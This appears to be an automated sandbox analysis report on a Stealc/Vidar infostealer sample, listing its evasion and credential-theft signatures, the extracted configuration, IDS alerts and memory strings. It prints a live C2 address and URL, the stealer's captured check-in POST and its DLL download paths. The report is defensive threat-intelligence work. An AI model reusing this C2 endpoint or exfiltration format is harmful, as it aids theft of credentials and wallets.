Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1518673
MD5:	0e61d1e023f371c6ba74939512e40085
SHA1:	e7ed889e50004229e721ef910059b8ef7fbdffd6
SHA256:	71dc3327500da80337a73deb8b4161ae844864aeb0985c4c8e058fb2ebac9b93
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0E61D1E023F371C6BA74939512E40085)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1659118085.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 6632	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6632	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6632	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.250000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:39:00.578726+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:39:00.200964+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:39:00.796565+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:39:01.903727+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:39:00.804015+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:38:59.975127+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T00:39:03.404191+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:08.048170+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:09.274786+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:10.612779+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:11.496260+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:15.284439+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:16.187375+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 45 41 35 36 44 33 39 45 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="hwid"66EA56D39EC058492808------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="build"save------KEHDBAEGIIIEBGCAAFHI--

Source: file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/#
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllz
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll.
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllf
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll/
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll8
Source: file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllw
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpM
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe950
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpq
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37tE
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1957073274.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: FBFCAKKK.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: FBFCAKKK.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FBFCAKKK.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://support.mozilla.org
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000003.1756083936.000000001D25C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1756083936.000000001D25C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
